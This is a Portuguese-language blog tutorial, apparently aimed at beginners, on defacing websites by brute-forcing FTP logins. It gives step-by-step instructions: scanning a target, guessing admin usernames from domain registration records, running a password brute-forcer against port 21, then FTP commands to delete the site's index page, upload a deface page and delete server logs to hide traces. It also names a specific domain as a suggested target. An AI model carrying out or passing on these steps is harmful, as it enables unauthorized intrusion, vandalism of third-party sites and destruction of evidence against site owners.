publicidade
publicidade
publicidade
publicidade
publicidade
publicidade
publicidade

Deface via FTP Brute Force

Sugestao de testes
tvm.co.mz
Aqui estou com mais tutorial meu, sobre fazer deface via ftp quebrando barreiras com brute force !
Para sua compreesão, é necessário vc saber alguns requisitos básicos como:
*Se o site alvo roda serviços de ftp
*Conhecimentos básicos sobre ftp
AVISO:
Escrevi o tópico direcionado ao pessoal que esta chegando agora(que são muitos), e para aqles que gostam mais e mais de aprender.Se vc se considera um hacker arrogante “elite” ignore esse texto.—-Downloads e links exteriors vc encontrará no final do tópico
->O ftp é um serviço usado a bastante tempo para transferências de arquivos para hosts remotos(up e download).Ele usa a porta 21 como padrão.E nosso propósito aqui será de mostrar basicamente como você pode ganhar acesso à esse host remoto.
->Atacando via Brute-force
Leve em conta as seguintes considerações:
ALVO: www.essesitenãoexiste.com

IP: 189.25.78.145
SCANNER: por um bom scanner descobrimos que o servidor usa ftp sim(não precisa ser necessariamnte anônimo), o servidor é o pure ftpd 1.0
Com nossa máquina cujo sistema operacional é o Windowns XP sp2, vamos ao MS-DOS -> Digitamos FTP -> Digite help e pressione “enter”.
Aparecerá então uma lista c0mo essa:
user : nome do usuário para logar-se
pass : senha do usuário para logar-se
get : faz download de um arquivo específico
put : faz download de um arquivo
rename : renomeia o arquivo especificado
cd : muda de diretótio
cd.. : sobe um diretório acima
disconnect : finaliza conexão ftp
dir : lista os diretórios do servidor
open : abre uma conexão em ftp
bye : fixa a conexão e sai do prompt
Bom, vamos por em prática, começando por exemplo a rodar o scanner “nmap” e vamos a descobrir o sistema operacional do site, que na ocasião é “Linux Ubuntu 7.10″
Vamos novamente(agora que você já sabe como chegar lá) ao prompt do ftp.
MÃOS NA MASSA:
Já no prompt FTP, vamos abrir uma conexão com nosso alvo, para isso siga o exemplo:
o 189.25.78.145 [enter]
Nisso, será pedido o login.
->User
Neste campo basta digitar ‘admin’, SE esse usuário existir, será pedido então uma senha , mas se não existir, aparecerá uma mensagem de erro.
DICA:
Quote:
Em outras ocasiões, você pode usar alguns métodos que eu uso e recomendo para descobrir o nome do ‘user’.Basta você entrar no site registro.br, pesquise sobre o site alvo e veja os nomes dos webmasters, normalmente são os nomes do user.Ou então, vasculhe o site ou pegue como referência o e-mail de contato com o administrador.Já deu certo comigo várias vezes !
No nosso exemplo(cmo alguns ja perceberam), o site alvo tem como servidor o linux, e seu admin é chamado de root,que tem acesso irrestrito ao sistema, com permissões de editar, excluir, upar, ‘downloadar’.Chegar ao usuário root é nossa missão.
Vamos supor que você seguindo alguns métodos para descobrir o nome do root(acertação, mandinga, footprinting, whois…) consiga com êxito o nome do usuário root…mas e a senha tio Sanders? Aí q está, isto é uma coisa que você só vai conseguir seguindo três métodos:agindo como um defacer, fazendo macumba ou simplesmente pedindo a senha(esta última na minha opinião é a mais difícil)
Depois do nosso constrangimento para saber a senha, vamos usar um dos métodos maaaais simples de se conseguir a senha, via brute-force !
No nosso exemplo usaremos o programa ‘Unsecure’, que para quem não sabe, é um programa que vai combinando senhas até conseguir descobrir
Vamos de um pequeno tutorial Unsecure:
->Hostname or IP:coloque o ip do alvo aqui(no nosso caso é 189.25.78.145)
->Port:Porta da conexão, e, como estamos fazendo um ataque via ftp, use a porta 21.
->Current Password: Neste espaço será mostrada a senha descoberta.Apenas não digite nada.
->Usernameigite root
->Dictionary file:Nome da sua wordlist(SE você usá-la, faça uma com o nome de unsdic.txt)
Vamos as opções de ataque:
*Primeiro vamos levar em conta que não fizemos nenhuma engenharia social e nem temos uma wordlist boa o suficiente.Por isso não usaremos nenhum tipo de lista de palavras.
*Marque “reconnect on disconnect” para se caso o ftp falhar depois de algumas tentativas, ele volta automaticamente onde parou.
*Vamos marcar todos tipos de caracteres disponíveis(números, letras maiúsculas, letras minúsculas, caracteres especiais)
*Aperte Connect
Vamos supor que depois de muito tempo descobrimos a senha, intão aparecerá uma mensagem igual a esta:
“Server 189.25.78.145 is unsecure.The password is MANCHESTER”
->Vamos para o FTP.Já no prompt de comando, digite:
ftp> open
ftp>189.25.78.145 user root pass MANCHESTER
aparecera a mensagem:
“user root logged in”
PRONTO! estamos logados como root! Agora nosso próximo passo será encontar a index, para que possamos ‘deface-a-la’
ftp>dir [enter]
->será listado os diretórios, procure especialmente pelo do ‘apache’.Para acessá-lo, siga o exemplo:
ftp>cd apache [enter]
ftp>dir [enter]
Mais um dir e achamos diretório ‘htdocs’, é la que fica(em servidores web apache) a index.Para acessar siga o exemplo:
ftp>cd htdocs [enter]
ftp>dir [enter]
Pode procurar que você ira achar o arquivo tão procurado ‘index.html’.Vamos começar o processo de substituição?
digite no prompt:
ftp>delete index.html
*estaremos deletando a página original
ftp>put deface.html
*coloque sua page deface que está no seu PC
ftp>rename deface.html index.html
*renomeamos para ‘index’.
Bem, nós acabamos de fazer o deface, agora vamos tratar de apagar nossos rastros deixados no servidor.Vamos ao anonimato:
ftp>cd [enter]
*voltamos para um diretório anterior, estamos no diretório do apache, depois:
ftp>dir
*procure por logs, acesse o diretório, e delete tudo com o comando ‘delete’.
Pronto, digite ‘quit’ e acesse o site vítima ‘www.essesitenãoexiste.com’ e visualize a NOSSA página desfigurada.
Tente fazer um teste com dos sites seguintes p ver oque ha de bom..
Crdetidos -- Invasao
Deixe seu Comentário:
Sem comentários »
Categorias:
,

0 comentários:

Postar um comentário

ORA VIVA, OLHA TEU COMENTARIO VALE MAIS DO QUE OURO PARA MIM, PRECISO DELE PARA MELHORAR A DISPONIBILIDADE DO BLOG.